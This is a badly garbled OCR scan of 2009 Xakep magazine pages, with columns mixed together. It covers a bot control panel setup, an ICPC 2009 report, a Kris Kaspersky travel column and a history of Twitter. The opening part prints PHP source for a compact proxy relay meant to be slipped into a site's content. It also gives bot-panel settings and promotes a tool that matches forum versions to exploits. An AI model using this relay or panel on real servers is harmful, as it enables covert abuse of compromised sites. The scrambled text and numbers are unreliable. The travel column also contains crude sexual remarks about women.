$prot = О; /I используем логин ИЛИ 2. Затем запускаем локальный скрипт:

нет? О - r"P,.LSE, 1. - "rR()E pet'l plocal.pl -рк http://site.com/

$пате='сfсd208495d5БSеfБбе7dff9f98 proxy/pproxy.php 'ZI(lщ><.<:u ..
...... п т..д
Ф не мс~~еш. r.;:.щ •• ...п.~
oa<..__.....
7б4dа'; // md5. usеП'!сJmе, (О) З. После этого по дефолту открывает­
вrti>-_.

OIIt"!IlI"obaI1.SoduS
Ц>еО' ~-.J
$раss='сfсd208495d5б5еfббе7dff9f98 СЯ порт 8008, через который и следу­ л"",",,, ~_Io.(_.lIItо~",_I-_--..J_~--J

7б4dа'; //тd5. passwo!:"d (О} ет пускать 6раузер ~ .. rng_яo:r"1>J>GQ~"'1"I!n"1)~ИIQmМ)"О'ЦUl.Q",~f;y,lIЩ<!t.tl(9Т~.SoOCI1I,,~"""1)--'-"

,ф<~I)"",."oIo_ _ ,..,.c;q»''''1"~.nP",<JO/Wo.<t'~
•• J4>6.8,,,,,,,,,,un..IA_''''_ВoWd.~

$host = "10calhost"; / / MySQL-хос'I'

$user = "root"; /.1 ~1ySQL user Сорец pproxy.php очень компактен и может быть ОПРЕДЕЛЯЕМДВИЖОКФОРУМА
$pass = ""; / /MySQL user pass·.vord заПРОСТQдобавлеf1В тело ко f1T€нтэ саЙта.
$db = "stats"; / /Н8.звание БД
$table = "bots"; / /название ",аБЛИЧК!1 <?рпр Напоследокпредставлютебе очередной
"ar' $с imeout = БОО; / /зреИ5i нахож­ //$зессес = 'рруохуразз'; релизотdх - Forum Detector. Утила пред­
дения бота в БдJ поспе истечения i f (isset ($_POST [ 'query' ]) && назначена для определениятипа и версии

ука:занного времени бот автоматически isset($_POST['host']) ) указаНf10ГО форума, что особеf1НО полезно при
удаляеТС~f, Р.спи не дал о себе знать поис(е сплойтов под различные форумные
if(isset($secret) && ($_
движки. На данный моменттулза поддержи­
в админке ты можешь f1аблюдать следующие POST [ 'secret'] ! = $secret)) exi t;
ваетнеСКОЛЬКQ самых извеСТf1ых форумов,
ПОЛА: hеаdеr('Сопtепt-tуре: среди которых - IP8, phpBB, v8ulletin, МуВВ
appl~cation/octet-stream'); последних версий.
[E.R.T.I::.] - команда @set_tirne_1irnit(0); Из возможностейскриnта следует отметить:
[L. Роус] - Local Port - локаль­ $query ~ base64_decode (str_
ный порт. на который бот будет слать t·epJ.acel" ". "+". $_POST[ 'quet·y'])); • Определение типа форума (расrrозна­

данные list ($hOSl, $port) = explode (' : '. вание IPB. phpBB. vBulletin. МуВВ)

[L.Host] - Loca1 Host - наш :еР-адрес Ьаsеб4_dесоdе(str_rерlасе(" "+" • Определение версии движка форума

[Кеу] - RC4 пароль $_POST['host']))) ; по разным критериян

[R. Port] - Remote P-ort - удаленный if(!$port)$por-t = ВО; • Определение ВО31'10ЖНЫХ уязвиностей

порт, который прослушивает бот $ip = gethostbynamel$host); движка Форуиа и поиск поцходящих для

if (!>fp = @f.sockopen ($ip, $Рой. них сплойтов

в общем, поюзай самостоятельно. Только не $etTnO. $еп·str. 20)) • Определение ТиЦ и PR саЙта. нд. ко­

забывай, Ч1Оты уже взрослый и за все свои тором установлен форум

действия ответственность несешь сам fwrite($fp. $query); • Наличие поддержки работы через

-._----- иhiJ.е (! feof ($fp) )

прокси/sосks5/прокси с авторизаци­

ПРОГРДМt'1Д; PPROXY {
ей/sосks5 с авториsацией

B*NIXI\oIIN $answer = fread($fp,

,О24);

r;.1#1(1]#lBONSI echo $ans l€::r.;

T.... Конечно, утила сплойтза тебя не эапустити
Потребность в проксиJcоксах 80Зн и кает посто­ }
веб-шелл f1a сервер не зальет Но еслиты решил
янно. Гlроблема в том, что найти стабильный и fclose ($fp) ;
протестировать пароч ку-другую интересных

качеетвеf1f1ЫЙ сервис с каждым днем становится форумов - тулза в этом поможет.::JC

ХАКЕР 06 11261 09
 >> сцен.:.

OFTHEBRA
ОТЧЕТ С ФИНАЛААСМ ICPC 2009
21 апреля 2009 года три сотни лучших молодых математиков и программистов

собрались в Стокгольме для участия

в финале Чемпионата мира по спортивно­

му программированию АСIV11СРС,
главным спонсором I<ОТОрОГО выступает IВМ.

По приглашению этой замечательной I<омпании я и отправился в Швецию,

чтобы своими глазами увидеть битву лучших молодыхумов планеты.

«Для решения серьезных проблем нужны Любая проблема здесь, как бы она ни была Также намечалось интересное российско-ки­

величайшие. уверенные в своих способнос­ подана, всегда уп ирается В соста вление тайское противостояние от Китая традицион­

тях умы, способные предложить нестандарт­ математических моделей и решение мате­ но приехало немало сильных команд, готовых

ные решения. - считает доктор Билл Паучер матических задач. Решений «на пальцах" не бороться за самые высокие места
[Blll Poucheri, профессорУниверситета бывает даже если задачку и можно решить

Бзйлор [Baylor UПlvеГSllуJ и исполнительный тупым перебором. такое решение не пройдет Соревнования и итоги
директор чемпионата ICPC - Их можно по ограничениям на ресурсы - для каждого Непосредственно фи нальные соревнования
назвать атлетами ИН,lOваций Они выходят за задания существуют пороговые значен И51 по проходили В КТН - Королевском технологи­

рамки ограничений и получаютудовольствие, используемой памяти и времени выполнения. ческом университете Стокгольма. И ровно в 9
делая эту работу». утра 21 апреля был дан старт соревнованиям
Что говорить. спортивное прОI-раммирование Участники В этом году участникам было предложено

- штука очень специфичная, стоящая особ­
няком от того, что большинство людей вообще
привыкли понимать под программированием.
Задачи. которые ставятся на соревнованиях
по спортивному программированию. несут
1, в себе. главныt-:1-0.бразом. математические
и алгоритмические вопросы СПОРТИ8ное
программирование предъявляет к участникам
соревнований высочайшие требования в
в зтом году представлять Россию поехали
команд ИТМО Iчемпионы прошлого годаl.
Саратовский ГУ [чемпионы России этого
года], МГУ, Алтайский ГУ. Новосибирский ГУ.
СПБ ГУ, Уральский и Южно-Уральский ГУ. Так­
же среди участников были такие известные
вузы как М1Т. Стзнфорд, Оксфорд, Варшав­
ский Университет, Университет Карнеги­
Меллона и Циньхуа Предматчевые расклады
8 11 задач, наиболее простой из которых
оказалась задачка с индексом «А»: ее
решили очень быстро и для большинства
команд именно она была первой решенной
задаче~i.
За 5 часов соревнований было решено 9 из
11 зада ч: зто см огл и сделать две команды
- ИТМО и Университет Цинхуа Победите­
ля определили по затраченному времени:

области математической подготовки, команд­ были простые: команда ИТМО приехала показав результат в 1381 минут второй раз
ной работы и навыков быстрого и чистого отстаивать статус Чемпионов мира. а все подряд ЧемпионамVI мира стали ребята из
программи рования остальные приехали мешать им это сделать:J. ИТМО!

~ 070 ХАКЕР 06 /126/ 09

~ 071
» сцена

~ links
• jroc.bavlOГ.edlJ
официальный сайт
чемпионата. Тут ты
можешь поо~отреть

фото и видео-архив.
скачать задания с

предыдущих сорев­

нований и получить
любую другую инфор­
мацию о чемпионате.

• WWW.5пагkпеW5.ir1fо
- новости российс­
КИХ и международ­

ных чемпионаТО8 по

программ ированию.

• w\Nw.loQcoder·.com
- сайт "сольного»
соревнования для

програММИСТО8.

• WWW.орепсuр.ГU ­
открытый чемпионат

МГУ по программиро­
ванию.

• gQQgle.coIТl!
cocJejam - чемпио­
нат codeJдm. который
про водит google.
• асm.timus.ГU - сай,
УРГУ. посвящен­

ный олимпиадам по
программированию.

Тут размещен
выдающийся архив
задач и проееряюшая

система.

€)

~ dvd
На нашемдискеты
найдешь задачи

зто го года. а та кже

подборку фотографий
с финала ДСМ ICPC
2009 в Сто кгол же.

ХАКЕР 06 /1261 09
ФИНАЛЬНЫЕ РЕЗУЛЬТАТЫ

НА3ВАКИЕ ВУЗА РЕШЕНО ВРЕМЯ

УНИВЕРСИТЕТ ИТ, МЕХАНИКИ И 9

1381

ОПТИКИ IСАНКТ-ПЕТЕРБУРГ)

T51NGHUA UNIVER51TY 9
1800

САНКТ-ПЕТЕРБУРГСКИЙ ГУ 8
1176

САРАТОВСКИЙ ГУ 8
1305

UNIVER5IТY OF OXFORD 7
998

ZHEJIANG UNIVER51TY 7
1117

MA55ACHU5EH5 IN5TITUTE OF 17
1143

TECHNOLOGY

АЛТАЙСКИЙ ГУ 7
125"

UNIVER51TY OF WAR5AW 7
1"13

UN 'УЕ R51 ТУ OF WATERLOO 6

787

1. JAVAKHI5HVILI TBI LI51 5ТАТЕ 6

933

UNIVER51TY

CARNEGIE MELLON UNIVER51TY 6

10"5

ХАКЕР 06/126/ 09 ~ 073

--------
 •

О
о

1",
~

;:J
» о lJ
7

О
7777
[J О О
О

~ 1. :р q- Д сч.г+F ъ,
tf-Jll: (Ь ~eJ J1l::::P9::::J-l'-tJ1ltu

t:?~7~?rR,гR

о
г
u
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
[l
с::
о

о
о
l
о

cF _С1+д сч'.-V Lt. еР ъ'гrfJ СЧ,д'

qh--& СЧ,гrP 9::;,,+1-1 t

l-=~ ~ Itp 9::::J-l4=РCJ-jl СЬР r:ЬJ l-::r 9::::J-lLtP yJ ~::Fч:::JJl[y 9::::J-lЧ-гqd-,

t:I~ct:7~7~[~~?[~?~·I:'~~J~?
о (1 по [Jf] О о о I

П О О О О О r' о [J О

'~q~G~,~g}G[l~tp~
~7tJ(,е7~7гН"p,~~
о u о о о

о о о о

ЧТО е !:IчИ ... . . . оеЬ

екрисом?
Вся правда о настоящем и будущем Криса iКасперски

Почтовый сервер редакцииIуже несколько месяцев трещит под натиском

писем с темой «Крис Касперски». Читателей мучают вопросы: «Что случилось

С мыщъх'ом?»,«Будетли он снова писать статьи?». Сначала мы отвечали, что

те пятьдесяткустов дурмана, которые росли у него на делянке, погубил ураган,

и прихода больше нет Затем - что его, с зеркал кой и китайским паспортом,

приняли спецслужбы на территории американского посольства в Сеуле.

вступ ИТЕЛ ЬНОЕ [компания Епdеаvог Security. куда первона­ - Нет, у иеня есть кошка I - сказала

СЛОВО РЕДАКЦИИ чально устроился мыщьх, теперь является Алиса, - Ее зовут.

Сейчас мы откроем страшную тайну; что частью этой корпорацииl. - Прекрасно! - обрадовался грифон.

же, на самом деле, случилось, .. Вынуждены о ездите докладами по хакерским конферен­ -- ДаЕНО пора 'гебе рассказать нан о

1. признаться, после одной из редколлегий циям; себе и о СВОих приключениях.'

нам пришлось усыпить Криса Ic помощью о ведет с различными издательствами пере­ Льюис Кзрролл. «Алиса в Стране чудес»

двух сексапильных близняшек, подогнанных ГО80РЫ по переводу и изданию своих книгза

Андрюшкомl и отдать на опыты в лабораторию рубежом; Да простятмнечитатели некоторую сумбур­

,~
экспериментальной медицины, чтобы выпла· • судится с посольством Южной Афри ки; ность повествовагlИЯ,ЭТИ строки пишутся из

~ титьдолг перед финской типографией (факен • егохвостсворачивается в ИВрИI. поскольку в далекой и загадочной Малайзии - страны

<
'~
кризис l ] Израиле у Криса тоже ки п ят мажорны е дела самобытной экзотики, роскошных песчаных
It's ajoke, амиго, не волнуЙся:l. В действитель­ пляжей и восточного колорита, Мысли скачут

.~
Какты понимаешь, все это отнимает невероя,'·

ности. Крис крутится по всему периметрутак. ное количество времени и сил, НО он планирует сайгаками по колдобинам, от избытка впе·

ЧТО ды М из ушей идет: вновь писать в:н:. и ВОТ тому подтверждение, чатлений ТОПОРЩИТС\1 шерсть, и хвост встает
('
~
~
• работаеl' независимым консультантом в
подразделении McAFee, сотрудники которого - у тебя есть свой конек?! -- спросил
Аыбом, потому как потрясающе красивых

девушек здесь больше, чем буддистских

~ занимаются разработкой НIРS/IРS-систем ДеПИ1сатес, монахов, предлагающих проголосовать за

~
~
"" ~ 074 ХАКЕР 06 11261 09
~
1

ML1P, ПрL1чем ОДИН голос стоит не меньше
сотн" рентген, а то и двести. На наши деньг"
-7500 рублей. Дорогой мир, однако
ЛЕНИВЫЕМАЛАЙЦЫ
Большой неОЖL1данностьюОl(азалсяДЛЯ меня
ужасаlОЩИЙхолод, вынуждающийтаскатьс собой
свщер, И ЭТО ПрL135 градусах по Цельсию! Ну, в
TeHL135, а во всех остальных местах понатыканы
КОНДИЦL10неры, рабстаЮЩL1е на полную мощность.
Только L1 ищешь, где бы согреться И еще ищешь,
чего бы эаТОЧL1ТЬ. Малайская еда вкусная, дешевая
lяблочны й сокдороже обедаl, но совершенно не
КЗЛОРL1йная, а потому быстро переваривающаяся
Девушки здесь цвета радуги - яркие одежды,
пестрые ;<раски. П ра ктически все читают Коран
L1 ходятв платках, L1 сам" малайцы жалуются на
то, что под юбку к ним так просто не полазишь Ну,
насчет «не полаЗL1ШЬ» они слегка ПОГОРЯЧL1ЛИСЬ.
ЭТООНL1 сравнивают малаек с американками,
которых видели только по телевизору и о которых
товаРL1ЩИ. побывавшие в AMepL1Ke, рассказывают
вся кие бай KL1, как эападные женщины готовы лечь
под первого встречного, Малайцы слиш ком ле­
нивые, чтобы ухаживать, Адевушки тут .. TaKL1e же,
каки везде. особенно еслиучесть, что малайцев В
Малайзии нетакуж и MHoro. TYPL1CTOB - куда боль­
ше. Китаянки, японки .. , ПРL1веТЛL1вые, открытые и
оБЩlЛельные. AMepL1KaHCKL1e девушки также легко
идут на контакт. осооенно в местах вынужденного
заключения, типа аэропортов и прочих домов
терп и!"юсти Легкость, с которой он и переходят на
обсуждениеличных проблем, просто поражает,
но это вовсе незначит, что знакомство получит
продолжение, Знакомство ~ это одно, а ни к чему
не обязывающая беседа - совсемдругое.
ОГРАБЯТ, УБЬЮТ,
ИЗНАСИЛУЮТ
Вообще говоря, люди здесь удивительно дру­
желюбные, привыкли улыбаться и общаться.
ХАКЕР ОЬ '1261 09
А все почему? Преступлений ЧТОЛL1 меньше?
Так ведь ни xBocTa l Карманы L1 барсетки
режут прямо в центральных аэропортах. Бай­
керы срывают сумк" на ходу, Гопы сначала
бьют по голове, а уже потом смотрят, что ы
карманах у жертвы. Криминальная r-роника в
газетах - вообще кошмар на улице Вязов И
зачем только я ее читал перед тем, как сюда
поехать? I Первы~ ден ь провел на KOHKpeTHO~1
L1змене, ОЖL1дая подвоха, но потом махнул
хвостом. В МНОГОМL1ЛЛИОННОЙ Куала~Лумг>ур,
конечно же, не обходится без преступлениЙ.
Вот только никто не делает L1з этого трагедии
мирового масштаба L1 не живет В посто­
янном страхе, что сейчас ограбят, убьют,
изнасилуют и даже "мен" не спросят. Не, на
самом деле меня тут едва не изнасиловаЛL1,
И руку на грудь клали, и за хвост хватали, и
только когда она поняла, что ей с подругой
ничего не обломится, натуральным обра­
30М выстаВL1ла за дверь А дверь эта была
в деревне. И такси там по~мать нереально.
Общественный транспорт ходит по непонят­
ным траекториям. Благо, хоть ТWlп-Тоwегs
(небоскребы «Башни Близнецы Петронас»1
были видны, и мыщъх, как дурак, шел по
азимуту четыре часа, пока не добрался до
цивилизации И все время думал ну вот,
се~час ограбят, убьют, изнасилуют. Так ведь
нет ' Не ограБИЛL1, не убили, не юнасило­
вали. Малайзия в зтом плане интересная
страна. За наРКОТL1КИ приговаривают к смер­
тной казни, но все какбы в теме, L1 у всех есть
«very speclal stuff, поt а drug» И вот CL1AL1M
I
....
.... , / (:цен.:.
мы, значит, в чулане у раджи, прямо на обо­
чине свальной борозды, долБL1М этот«поtа
dгug» L1 rOBOpL1M за все дела KcтaTL1, "ндусы
к малайкам абсолютно параллельны. Они на
них насмотрелись, "м латинок подавай.
в ОТЕЛЕ, НА ТОПЧАНЕ
Сами малайцы только о русских девушках и
говорят, хотя МНОГL1е их никогда "е видели. Оно,
конечно, понятно. РУССКL1едля HL1X - экзотика,
а самые красивые - это еврейки, причем с ав­
томатом_ Девушка С оружие'м в руках выглядит
сексуально, особенно если она только после
армии (в ИзраL1ле все деВУШКL1 служат) и со
СПОРНIВНОЙ подготовкой У нее все в порядке
Гуляешь с такой по ночному городу и чувству­
ешь себя в полной безопасности.
Еврейки мыщьху настолько понраВИЛL1СЬ, что
он даже HI~ с кем не переспал И ка к это я так
отличился, не понимаю Хотя, скорее всего, это
связано с сильной усталостью Я же сюда не на
отдых приехал, а на работу. К вечеру настолько
выматываюсь, что сил хватаеттолько на то, чтобы
посидеть с коллегаМL1в ресторане, после чего
вернуться В отел ь и завалиться на топ ча н. Нату­
ральный такой топчан. На который и девушку-то
пригласить стыдно. Аеще называется «хороший
отель», где на второй день половые стащили
свое же собственное покрывало L1 пришлось
долго разбираться с менеджером, на хвоста они
это сделали. У нас в отелях, конечно, тоже воруют,
но воруют осмысленно и по понятиям
Зато у них можно спокойно посидеть с де­
вушко~ В очень дорогом ресторане за ее счет.
~ 075
 thPqJJ
:fl:-"=# ..... .~.. сцен.:.
о LJ

О 1]

о
о

\I :~
~e? о
о

:fp
f,~e~,
С.I о
О r.:

'~"' о ;J

Мыщъх сидел с тремя, причем две из них замужем Одна - змигрантка Атаки следую]' непрерывно,так что лучшего места для тестирования

из Америки, остальн ые - коренные израильтянки Все образованные
и начитанные, умные до невозможности, И ВОТ сидим мы, Значит, В рес­
торане под открытым небом На улице уже зима, ночь Слегка прохлад­
но, но еще не холодно, Мимо нас идут ЛЮДи, а мы пьем пиво [ну, это она
пьет пиво, а мыщьх - вишневый сок) и обсуждаем OpenBSD, ламповые
усилители HiFI-класса, критикуя беспроводные колонки и прочую
систем обнаруженияи предотвращениявторжений, пожалуй, не найти,
Не могу умол чать О том, ЧТО в октябре п рошлого года здесь про води­
лась конференция HITB [Hack In The Вох), посвященная различным
аспекта,~ инфор,~ационнойбезопасности На ней я представил
доклад о найденных мной недоработках в процессорах Iпtеl, которые
позволяют использовать уязвимости как непосредственноСИДЯ за

потребительскую муть, Оказываеl'СЯ, у нее трое детей, она ученый и компом, так и удаленно, вне зависимости от операционной систе­
большой меломан, Ассемблер - это так, невинное хобби мы, установленных обновлений и приложений, Но зто уже тема для

отдельной статьи ..
АТАКИ СЛЕДУЮТ

~ '1
НЕПРЕРЫВНО
P.s.
Что касается хакеров, то G Малайзии они тоже наличествуют, причем Frою: Kris Kaspersky
практически всеза,шкаются на сетевой безопасности,дизассембли­ То: andrushoek@rea1.xakep.ru
рованием здесь никто не занимается - на Н IEW смотрят с удивлением, Subj ее t: Re (16] : статьи в следующий номер

а ИДУ зна ют на уров не новорожденной м ыш и, Зато в сетях шарят чисто

'\ конкретно, но в основном - в сторону взлома, а не воздвижения Тут Доброго времени суток!

\ даже в столице интернеттормозитта к, как не тормозиту меня дома в

деревне Есть куча ,~ecт с бесплатным \NI-Fi, что существенно упрощает Только что вернулся из Малайзии, Устал жутко Долетели на честном
сетевые атаки и обкатку новых технологий взлома и защиты ОТ нападе­ слове и одном крыле, Один сегмент крыла отсутствовал ;-( ахренеть,
ния, Никогда бы не поверил, если бы не видел это сВоими глазами, Х

.076
 \

1~'m_1 Игры меняются,

:1.01 JIdипiI!IlUJ gamelandIu остается!
 История

Тwitt@гевеРХ-ПОПУЛS1рен на ЗапаДе и стремительно набмрает оБОРQТЫ в других

странах - на него постоянно ссылаютсS1 в СМ И, twittег-сзккаУНТbI ест!;;> у многих

знаменитостей, и даже президеНi США Барак 06ама ведеТТ;dМ свой блог.

На ПQ·ка оДни называютТwittег гениальным изобретением, друrие вместо ин~

новаций !;3идят лишь грамотную рекламу и стадные инстинкты. Кто же прав?

в ЦЕЛОМ, нужно признать, ничего ин­ ИЗОБРЕТАЕМКОЛЕСО LlveJournal был совсе'! молод - регистрация
новационного и ранее невиданного Twittec ПРИДУ'lализагадочнуюпомесь блага с 1М [iпstапt осущеСТ8лялась по пригла шениям, и Дорси

действительноне несет. Явлению "сетевого messenger) в 2006 годутри '10ЛОДЫХ IT -шника:Джек получил в системе номер 4,136. Нес'lОТРЯ нато,
дневника» CaMO'lY по себе никак не '1еньше Дорси (Jack Dorseyi, БиэСтоун [Biz Stonel и Эван что до нынешней популярности сервисубыло еще
15 лет, а если копнуть поглубже, так и вовсе Уильямс IEvan WilLlams] Но хотя создание сервиса далеко, Джеку ЖЖ понравился, а вскоре и вовсе
выясняется, что даже в до-httр-шный период, и является бесспорной заслугой всехтроих, ориги­ натолкнул молодого програ'lмиста на '1ысль.

еще во Bpe'leHa Usепеt, существовали нальная идея, всеже, принадлежала ДжекуДорси, Дорси понял, что ЖИВОЙЖУРI'lал можно сделать
подобия COBpe'leHHbIX блогов Специализи­ позтомуо не'! я расскажу чуть подробнее. еще более "живым». vi ДЛ51ЗТОГО нужно лишь

рованные сервисы для ведения онлайновых Дорси - программистЗ2лет от роду, увлечен­ добавить ВОЗ'lожность публиковать свой те кущий
дневн иков тоже появились далеко не вчера ный высокими технологиями практически с ста1УС в режиме реального вре'lени. Стоит сказать,
Например, столь популярная в рунете плат­ самогодетства. Еще в 140Н плотно заинтере­ чтотакая опция как «ста1УС» сейчас ПрИСУТС1'вует

форма для блоггинга - LlvеJоuгпаl!Живой­ совался логисти кой пересылок и переsозок, а практически во всех инстант мессенджерах, но

Журнал! недавно отметила свое десятилетие. точнее, программной стороной зто го нелегкого тогдаДорси подсмотрел ее BAIM [АОLlпstапt
Схожие факты и цифры можно привести дела Плоды его увлечения пожинают до сих Messengerl, которым активно пользовался')
на тему инстант мессенджеров. Не стоит пор - open sorce ПО, написанное ЮНЫ'l Джеком, Однакодо воплощения идеи вжизньдело не

забывать и о том, какое количество людей используют многие компании, предоставляю­ дошло 3адумка отправилась вдолгий ящик
по всему миру регулярно зависает в раз­ щие услуги такси. К 2000-му году, добившись - Джек был захвачен работой наддруги'lИ
личных социальных сетях [у нас зто, чаще определенных успехов, Дорси устал "работать проектами, ни один из которых так и не ПРИI'lес

всего, «Одноклассники» И «ВКонтакте», а за на дядю» и перебрался из родного Миссури в ощутимого результата. В итоге, о своей идее он
океаном - MySpase и Facebookl. Последние, Калифорн и ю. На но вом месте он орган изо вал снова вспомнил только в 20051'ОДУ, уже будучи
кстати, могут по хвастаться куда больши'l собственную небольшую компанию, оказываю­ работником подкастинговой компании Odeo Inc
,\ количествомфишек и наворотов, чем TWltter. щую курьерские услуги, услуги перевозки пас­

\ Так откуда же, спрашивается, берется такой сажи ров, а та к же доступ к зкстрен ны '1 служба '1 ДО СТРАННОГО ПРОСТО
ажиотаж, когда средств КО'lмуникации S Сети через Сеть vi кто знает, возможно, Джек так и в Odeo Дорси привела заинтересованность в
и без того в избытке? Чтобы ответить на этот продолжил бы работать в этой сфере, если бы в сервисах, ориентированных на текстовые со­

вопрос, стоит обратиться к истории сервиса. том же 2000-м не завел аккаунт в ЖЖ. общения - та '1 к ним тогда тоже проявляли оп­

~ 078
1
!
i

Небольшой список
известных
и родных сердцу
любого гика лич­
HocTeй' которых
можно почитать
в Twitter:
ДжорджЛукас (режиссер, создатель
"Звездных Войн,,):
l1ttp:! /t1Nitter.com/George_Lucas
Нил Гейман (писатель-фантаст, сце­
нарист, автор комиксов и графических
романов): http://t1Nitter.com/neilhimself
Уильям Гибсон (писатель-фантаст,
«папа» киберпанка):
httр://t1Nittег.соm/GгеatDismаl
Limor Fried АКА Lady Ada (хакер,
приверженецОреп Sошсе Hal'dware):
lшр:/ /twittег.сош/аdаfгuit
Стивен 80ЗНЯК (специалист по вычис­
лительной технике, основатель Apple) :
Iшр:/ /t1Nittег.соm/stеvеwоz
Стив Джобс (СЕО и основательАрр1е
[I1С.):
]1ttp://t1Nitter.com/Ste'TeJobs
Стивен Фрай (британский актер, писа­
тель и драматург):
l1rrр://twirrег.соm/stерhепfгу
~ .;
Кевии Роуз (создатель digg.com):
'1 httр://t1"1ittег.соm/kеviпгоsе
Кевин Смит (режиссер, актер, сцеиа­
рист, создатель "Догмы" и «[{лерков" ):
Ьнр:/ /twitter.com/ThatKevil1Smith
Джон Фавро (режиссер):
http://t\vitter.com/ Jоп]аvгеаu
~ 080
ределенный интерес. Компани~ переживала не которых получается слово. Но в ходе обсуждений
лучшие времена. В видусерьезной конкуренции всплыло словечко Тwttг [от искаженного англ.
на рынке [тягатьс~ с тем же iTunes явно не пред­ «twittep> - «щебетать»]. которое определенно
ставл~лось возможным} требовались свежие не обошлось беэ влияния Flickr, но быстро при­
идеи, проекты и. фактически, смена профиля. И жилось [к тому же. короткие SMS- номера в США,
в ходе очередного мозгового штурма, направ­ как правило, п~ти символьныеl. Но по оконча­
ленного на спасение положени~. Дорси иэложил нии тестирования открытие сервиса состо~лось
коллега м СВОЙ за мысел - создать некий сервис. по адресу Twttf.com не только из-за попытки
который позволил бы люд~м всегда быть в курсе, быть оригинальными. Была еще одна причина,
чем сейчас эаняты их друзья И где те находятся. горэздо более прозаическая - домен Twitter.
Джекхотел. чтобы добавление новых записей сот уже был кем-то занят.
в этот лайфстр им было максимально просты м Тем временем. дела у Odeo шли совсем плохо.
и быстрым. поэтому делал большой упор на Уже и безтого поредевший штаткомпаниито и
мобильныетелефоны и короткиетекстовые со­ дело приходилось снова сокращать. О новоис­
общения. Именно позтому в будущем у Twi tteг и печенном Twitter никто пока не знал. и команда
появится ограничение в140 символов - длина работала. фактически, на голом энтузиазме. И
одного SMS с за пасом дл~ н и ка. XOT~ сервис и запустили в работу, адевелоперы.
Коллегам идея Джека пришлась подуше На со­ наконец. смогли "выйти из тени» и начали ак­
здание прототипа сервиса у Дорси и Биза Стоу­ тивно приглашатьтуда друэеЙ. всеми средства­
на, который ранее работал стакими известными ми агитируя их пользоваться TWltter, успеха не
площадками для блоггинга как Xanga и Blogger, было. Большая часть юзеров просто баловалась
ушло порядка двух недель. Когда рабочую мо­ SМS-ками. не со всем пон имая. зачем и кому все
дель продемонстрировали остальной команде, это можетбыть нужно.
восторгам не было предела: сервис выгл~дел
очень простым. но на удивление законченным. ПЕРВЫЙ ИНВЕСТОР
Все туг же взялись за тести рование разработ­ П ару месяцев спустя ситуа ция не особенно
ки. по сути. подняв ТWlttегв закрытом режиме. изменилась.Разве что, были "докупленыдве
«только для своих». Пользователей насчитыва­ согласные»доменного имени - адрес Тwittег.
лось не более 50 человек. и над прое кто м витала сот перешел в распоряжение Odeo. и Twtt,
атмосфера секретности - предпочитали не при­ пережил ребрендинг, превратившись В Twitter_
глашатьлюдей ИЭДрУI-ИХ компаний и состороны, «Откуда же деньги?». - спросишыы. Сна­
давая доступ лишь избранным. По признаниям чала инвестор у проекта был всего один - за
самих разработчиков, это было удивительное финансирование взялс~ известный бизнесмен
время - ты чувствуешь. что собираешьс~ изме­ и IТ-деятель ЭванУиль~мс. ИнтересУиль~мса к
нить мир. но об этом еще никто не знаетi Тwittег легко объясним - во-первых, он был од­
Например, Биз Стоун вспоминает. что В первые ним из сооснователей тонущей Odeo и наблюдал
выходные тестирования у него выдалс~ ужасный за развитием идеи с самого начала и изнутри.
уикенд - дома как раз шел ремонт, перестилали Во-вторых. именно ему мы обязаны термином
полы. и вместо отдыха намечался жуткий аврал. «блоггер» и попул~ризацией слова «блог». Эван
И в какой-то момент. во время этой неразберихи. некогда приложил руку к основанию компа н и и
подал сигнал мобильный. Посмотрев на экран Руга Labs и фактицески создал Bloggercom.
телефона. Бизузнал, что Джек. тем временем, Позже. когда Руга LаЬsбыла продана компании
отдыхал в Напе. пот~гивая вино. Стоун призна­ Google. Уильямс с головой окунулся в новый
ется, что имен но тогда он окончательно проник­ стартарп - Odeo. Нуа когда последний начал
ся этой до странного простой идеей - продол­
медленно умирать. совсем не удивительно. что
жая заниматься своими делами. можно просто Зван оказался не против попробовать что-то
взглянуть на дисплей мобильного и узнать. че м еще. Для nомержки Twitter Уилья мс, Стоун,
сейчас за няты друзья. Дорси и еще ряд бывших сотрудников Odeo
основали компанию ObvioU5 Согр.
ИСКАЖЕННОЕ ЩЕБЕТАНИЕ
Исходно сервис планировали назватьstаt.us. ТWIТТЕR-БУМ
Это имя тоже придумал Дорси - ему всегда Мало- помалу вставать на ноги сервис начал к
нравилисьдомены. из имени И окончания концу2006 - началу2007 года «Новообращен­
ХАКЕР оь 112М 09
 What is Twitter? --
.. Watch:5 video!
-------­
Please sign '"
use.r nэmе сг еmзil эС'drеss:

~.passwOf(]: ---1

Twltter is а service (ог frienas, family, апа co-wor1<ers

o\,J;еIЮУU~/1oOIт ...,t'Q!"fr:>f"l
10 communicate апс! slay connectea through Ihe exchange о! )o:..<t'fц;(o,,"o,<:"~'<.·::

quick. frequent answers 10 опе simple que9Uon: What аге уои

aoing?

.. I - .

'i\vltt~ is сп Ц V;I!J'I 10 ifYOLlar!nl faJТ4ar\"IA1'II';"/IttC'f.

~ccrritl9It1en'9!l$«app. Ld c.МI ofttlose Lt:jr:gs. м.:~

\.I.y'$P.oe.lh'ISCtJl"I:::S;'II~

tll:liollousands!upi::f \"I"'tA)'CU
J." e.tr. AmuO(!..CIC<'I'I. S.rUtt'
f:tsr h.ta~ "Ьсщ! t. 8Ltt Cl10t YC.II Ms~

SI'r1lJSJ'gityollrt"~I'IoV(

fШCI'! (\IJI ~ ь.

Eric tI"шm. Allth« с:1 Тм ~ad

T,••'tIf:~1

ТЕМУ ПТИЧЕК

ные» наконец-то начали «подсаживаться» на зались не готовы. Было подсчитано, что в 2007 работали. Голый костяк Тwittег«оброс» полез­
Twitter, как и было задумано его создателя ми. году Twitter оставался в рабочем состоянии 98% I1ЫМИ функциями - чатом, R5S-трансляцией,
Появились первые симптомы широко рас­ времени, то есть набралось П04ТИ 7 полных суток постоянными ссылками на сообщения и тому по­

пространенного сегодня заболевания - люди просто~. В периоды dоwпtimе по адресу Iwilter. добными необходимыми мелочами, Разумеется,
комментировали в Twitter каждый свой ша Г, согп отображалисьразнообразныекартинки с каждым нововведением интерес обществен­

причем в буквальномсмысле. Один из первых на тему птиц, например,знаменитый fail whail ности к сервису только усиливался.

твитов от разработчиков оказался n ророческим. - падающий кит, которого в воздухе поддержи­ Наиболее значимым и заметным витком в
"О, зто будет вызывать привыкание» [oh this IS вают крохотные птички. Все зто сопровождалось популярюацииТwittег, пожалуй, стали прошло­

going to Ье addictivel, - написал в марте 2006 сообщением: «Слишком многотвитовl Пожалуй­ годние президентские выборы в США. После

